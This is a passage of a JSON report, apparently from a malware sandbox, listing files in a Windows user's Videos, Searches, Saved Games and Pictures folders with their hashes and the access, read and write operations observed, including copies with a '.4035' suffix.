7lFSQB0g\\Videos\\a0EWjZO0H70q\\X8k-TB9nSgqIJ6\\oIsaJRkn_H.mkv.4035", "hashes": [ { "md5_hash": "f8309ba83b0065a1b859c7b642fd9131", "sha1_hash": "9453edd5b686a33b834d503baa6f0e9f6e973c8a", "sha256_hash": "dbeda6849235fef5bd8e93626dcc68b3a47db7accf65b8e9ab9ce52dfcaea94f", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\x8k-tb9nsgqij6\\oisajrkn_h.mkv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\X8k-TB9nSgqIJ6\\oIsaJRkn_H.mkv", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\x8k-tb9nsgqij6\\oisajrkn_h.mkv", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\X8k-TB9nSgqIJ6\\teTxJJ37R28jW0n.mp4.4035", "hashes": [ { "md5_hash": "b5d2b2904421f460f0ee82e851a1c73b", "sha1_hash": "8052cd1b8cd81f3af82c39afe61f4033cec83930", "sha256_hash": "b1d597435da49e4db2d6deddc06f36f109eede08ddf5c8b62a916253aca12a4c", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\x8k-tb9nsgqij6\\tetxjj37r28jw0n.mp4.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\X8k-TB9nSgqIJ6\\teTxJJ37R28jW0n.mp4", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\x8k-tb9nsgqij6\\tetxjj37r28jw0n.mp4", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\X8k-TB9nSgqIJ6\\xhLR3jry9wKPAx.mp4.4035", "hashes": [ { "md5_hash": "58369a36db14e6595a789851b283d61d", "sha1_hash": "821665b9a25aa3c91c7e00b7cb0bf40f961dbd4c", "sha256_hash": "31daeaf2a8429e7790d3b2028937cec58f90bf48dc38895eb97c1652e8935360", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\x8k-tb9nsgqij6\\xhlr3jry9wkpax.mp4.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\X8k-TB9nSgqIJ6\\xhLR3jry9wKPAx.mp4", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\x8k-tb9nsgqij6\\xhlr3jry9wkpax.mp4", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\X8k-TB9nSgqIJ6\\YbWCW_EpzK5By0z.mkv.4035", "hashes": [ { "md5_hash": "b66d48e45ccae67e28d346f780e87270", "sha1_hash": "9c33c23391c521cadbbaf3f48318bd8be19b9d17", "sha256_hash": "b264303c73b0013757fabc7876459909651655deea5e77caf92ccf121be0be60", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\x8k-tb9nsgqij6\\ybwcw_epzk5by0z.mkv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\X8k-TB9nSgqIJ6\\YbWCW_EpzK5By0z.mkv", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\x8k-tb9nsgqij6\\ybwcw_epzk5by0z.mkv", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\X8k-TB9nSgqIJ6\\zmkOg8xlo9RCs.mkv.4035", "hashes": [ { "md5_hash": "4c550a4ad0eed37b442cffd2d373762a", "sha1_hash": "6b4cea08a912e6790a1bf97ebc31c5a556fc9c5a", "sha256_hash": "78d05e7485ed6429798f62fa257434d12232e3d4bf2e398a0ef60c4d85165d77", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\x8k-tb9nsgqij6\\zmkog8xlo9rcs.mkv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\X8k-TB9nSgqIJ6\\zmkOg8xlo9RCs.mkv", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\x8k-tb9nsgqij6\\zmkog8xlo9rcs.mkv", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\UrNkmksgAz1mrC-KZEW\\2I7JnWG0LWz13O.flv.4035", "hashes": [ { "md5_hash": "78bf02a3925027ace179e23ccb256869", "sha1_hash": "a602ebd54a826dfa56af05987dc72f68776f9521", "sha256_hash": "0246bd496eec13d9e735a0630b05e188b39f901ab5163d439e0fab04aa969c00", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\urnkmksgaz1mrc-kzew\\2i7jnwg0lwz13o.flv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\UrNkmksgAz1mrC-KZEW\\2I7JnWG0LWz13O.flv", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\urnkmksgaz1mrc-kzew\\2i7jnwg0lwz13o.flv", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\UrNkmksgAz1mrC-KZEW\\55QyNPcjbWZw8F.swf.4035", "hashes": [ { "md5_hash": "10708f3fb882e3d5f2b9417728f55c10", "sha1_hash": "c5b77bbaf011174e11489bcfbd03d58484eaf10d", "sha256_hash": "f703a89cc68563b310e3be883e34016ffdb1d842363b2cf10796175437f2bc7a", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\urnkmksgaz1mrc-kzew\\55qynpcjbwzw8f.swf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\UrNkmksgAz1mrC-KZEW\\55QyNPcjbWZw8F.swf", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\urnkmksgaz1mrc-kzew\\55qynpcjbwzw8f.swf", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\UrNkmksgAz1mrC-KZEW\\Mrd3L.mp4.4035", "hashes": [ { "md5_hash": "ca915502ceff9cde07b51cb12ed7107f", "sha1_hash": "a2d1a927685967566b64629315f52a1cd4cb9821", "sha256_hash": "1b91b76556c9bce0ed9dd528ba9bebc06465c9f8ba980708ec23a2ab30c4ae12", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\urnkmksgaz1mrc-kzew\\mrd3l.mp4.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\UrNkmksgAz1mrC-KZEW\\Mrd3L.mp4", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\urnkmksgaz1mrc-kzew\\mrd3l.mp4", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\UrNkmksgAz1mrC-KZEW\\ZGIRTyBopanWciF8O1.swf.4035", "hashes": [ { "md5_hash": "cc402bf50867ad79be1ae0c7960928f8", "sha1_hash": "df49e469711f447f0564ab9b1cce6df46b67876d", "sha256_hash": "c2a9e5ac5a555346e999bb9d0b416877af5092c74fd07a5f1890d44786d72e7d", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\urnkmksgaz1mrc-kzew\\zgirtybopanwcif8o1.swf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\UrNkmksgAz1mrC-KZEW\\ZGIRTyBopanWciF8O1.swf", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\urnkmksgaz1mrc-kzew\\zgirtybopanwcif8o1.swf", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Searches\\desktop.ini.4035", "hashes": [ { "md5_hash": "279891bd6c623ef3ffa2e21ddf63237b", "sha1_hash": "12d2f682467fed2c730f690c8e71f1fa6c9c16d3", "sha256_hash": "e1f69d779be647ec59560178cc9c8117ec15874b87898365129eaa7a758e0672", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\searches\\desktop.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Searches\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\searches\\desktop.ini", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Searches\\Everywhere.search-ms.4035", "hashes": [ { "md5_hash": "0ca019a9e1bd7e47a87cc6b550e74794", "sha1_hash": "44e35c6765d5b032ec350b0fd76db606b3ada11b", "sha256_hash": "5caa05d36fdce39064c466dcd1d1e752afa5c81c18cd7567ba20e8282088c3c4", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\searches\\everywhere.search-ms.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Searches\\Everywhere.search-ms", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\searches\\everywhere.search-ms", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Searches\\Indexed Locations.search-ms.4035", "hashes": [ { "md5_hash": "9af2058747ac183509e2234c230fb7ea", "sha1_hash": "8be6133aae04cb697aa897b2bc29b129e1dff3a8", "sha256_hash": "7fbc4231ab10e7f7050da43035cdee104a4d1152df2bad05250f03ac71ca24c1", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\searches\\indexed locations.search-ms.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Searches\\Indexed Locations.search-ms", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\searches\\indexed locations.search-ms", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Saved Games\\desktop.ini.4035", "hashes": [ { "md5_hash": "8ddb4bceb0d12f39dddf4247f8dc193a", "sha1_hash": "0418b977bf07ec646c4d37080d7d652b221e8ae0", "sha256_hash": "ce68f1294c3d128cf4a4c9eed21fc60673572b909ede222cae8bca8d28193932", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\saved games\\desktop.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Saved Games\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\saved games\\desktop.ini", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\2B4wMbwVq9SNluu4Mk.bmp.4035", "hashes": [ { "md5_hash": "16ef20050d6118d05d4276b949a9da27", "sha1_hash": "a54937aa85686b6e656afd83c46952aca1e57928", "sha256_hash": "0f0d2249f84ab0ed7073be3c097cb48c5bc8a95f4a839ad1c7d3e6a92d3c9e49", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\2b4wmbwvq9snluu4mk.bmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\2B4wMbwVq9SNluu4Mk.bmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\2b4wmbwvq9snluu4mk.bmp", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\3JtCbgJTkKSXrDHl2vx.bmp.4035", "hashes": [ { "md5_hash": "e4327e932fcd51b00be6b63f1f26dd07", "sha1_hash": "ed0c2be13590039a762b112a9a8d1ed90591032b", "sha256_hash": "5b0042c8fc3ad3a173ef46f55c4771d3bed87d9b09bd3146bb0112e069157a76", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\3jtcbgjtkksxrdhl2vx.bmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\3JtCbgJTkKSXrDHl2vx.bmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\3jtcbgjtkksxrdhl2vx.bmp", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\4tyoVjchuR84aw.gif.4035", "hashes": [ { "md5_hash": "d6d61bb1c14fe4d7ebfd1cc156376e1e", "sha1_hash": "6ea225e98a03a477fdf27b0a284125313fbd66ca", "sha256_hash": "864cf2df1ba5984ed77ea6aaf21bdf81da3d45200e6387ede02058cc5917f67d", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\4tyovjchur84aw.gif.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\4tyoVjchuR84aw.gif", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\4tyovjchur84aw.gif", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\6BloETBFt_jtJmwTWVVk.gif.4035", "hashes": [ { "md5_hash": "e2695b4e6c53876161fbd5711187ac9c", "sha1_hash": "3c8aa32a13a37993d55d8fe5b8c65e23933134a6", "sha256_hash": "be07b45b701687c60d85266d0f3a8c35c00d5d1d0a569b96cc2f8736d1766dea", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\6bloetbft_jtjmwtwvvk.gif.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\6BloETBFt_jtJmwTWVVk.gif", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\6bloetbft_jtjmwtwvvk.gif", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\6QfPygn63k3CNso.gif.4035", "hashes": [ { "md5_hash": "dc6c0d2bf7447847b1292f5ea5d19266", "sha1_hash": "c9d84ea937d475ca0cf56d99873fcc8f90525c4c", "sha256_hash": "199f42cb2e2c868e3be063ef6e9d06651e50713c9ca894e5157ce65a8bdd7898", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\6qfpygn63k3cnso.gif.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\6QfPygn63k3CNso.gif", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\6qfpygn63k3cnso.gif", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\70yIEg1GZzXq5b23S.png.4035", "hashes": [ { "md5_hash": "837c0ce4cfa32ce41c538836a136f29e", "sha1_hash": "bd177a3c4abccc0b7fdbd2e22dbf31b9a8ae171c", "sha256_hash": "1abcc8e53a2e01419d0b9d6cc7cdc09033f39daf8ce105be4b3d1d403efc7acb", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\70yieg1gzzxq5b23s.png.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\70yIEg1GZzXq5b23S.png", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\70yieg1gzzxq5b23s.png", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\7eR4.gif.4035", "hashes": [ { "md5_hash": "4794438ee0b8191d7677aba8026bcbaa", "sha1_hash": "dd93c574932a84bd0a1d8900bb6fe7c9ddd5b267", "sha256_hash": "8ac6d66c9664ec6c5b5f3e3d9127f1427fbac7b2400c89e14868d5ccd6c63377", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\7er4.gif.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\7eR4.gif", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\7er4.gif", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\A3L WgbY9v41odw.bmp.4035", "hashes": [ { "md5_hash": "7c0687ae9c177157f36a58f0f179ec33", "sha1_hash": "baca70a91ca496f795668d8c4c92ef7b64f4ab33", "sha256_hash": "fc1c35ced2205a0c07d6097236cc1a1fb721f9e9552837929b78abb1a0702158", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\a3l wgby9v41odw.bmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\A3L WgbY9v41odw.bmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\a3l wgby9v41odw.bmp", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\bAzjHbM7.jpg.4035", "hashes": [ { "md5_hash": "1adc5c394adb07ac7f2a6edc35655b01", "sha1_hash": "aa21580bd2c759b0d7e20b361c99c0dc4a165280", "sha256_hash": "97c428b1b036457703936b271228699bd116e399d1a5b01db603665a282f1b1a", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\bazjhbm7.jpg.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\bAzjHbM7.jpg", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\bazjhbm7.jpg", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\desktop.ini.4035", "hashes": [ { "md5_hash": "fae4aca400a240e9ee4af690f4864c7d", "sha1_hash": "eaa6dad5e0736f81c8e6a3baedd93d9ff4b04ec4", "sha256_hash": "c7a17a3103762701f5290d59e40d6f195a594e97b800de51c8546a8117ceb721", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\desktop.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\desktop.ini", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\L5W5AG34.png.4035", "hashes": [ { "md5_hash": "10a232191183067a720c8fb8924d21c6", "sha1_hash": "8b2844a640ccf135abbe71ef70e98881729476c6", "sha256_hash": "5120b66ae778d5c7196e33e0f26c39c912c5ebace2055a942f987d1c12315801", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\l5w5ag34.png.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\L5W5AG34.png", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\l5w5ag34.png", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\mNI47gY8.jpg.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\mni47gy8.jpg.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\mNI47gY8.jpg", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\mni47gy8.jpg", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\t13iG5ENuTJ-qPeSi.bmp.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\t13ig5enutj-qpesi.bmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\t13iG5ENuTJ-qPeSi.bmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\t13ig5enutj-qpesi.bmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\W6pfO.bmp.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w6pfo.bmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\W6pfO.bmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w6pfo.bmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\xv87g_eB5_wmmMt.gif.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\xv87g_eb5_wmmmt.gif.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\xv87g_eB5_wmmMt.gif", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\xv87g_eb5_wmmmt.gif", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\1CHeMfy7 NjqW CZ2-.jpg.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\1chemfy7 njqw cz2-.jpg.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\1CHeMfy7 NjqW CZ2-.jpg", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\1chemfy7 njqw cz2-.jpg", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\20pscY4eiNtD.bmp.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\20pscy4eintd.bmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\20pscY4eiNtD.bmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\20pscy4eintd.bmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\5k_z7icfE.bmp.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\5k_z7icfe.bmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\5k_z7icfE.bmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\5k_z7icfe.bmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\AXzS.bmp.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\axzs.bmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\AXzS.bmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\axzs.bmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\bVnuTIRu.png.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\bvnutiru.png.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\bVnuTIRu.png", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\bvnutiru.png", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\bYag45rCOLmmxmyin.png.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\byag45rcolmmxmyin.png.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\bYag45rCOLmmxmyin.png", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\byag45rcolmmxmyin.png", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\EuOR.png.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\euor.png.4035", "operations": [ "access" ], "type": "file_artifact", "version": 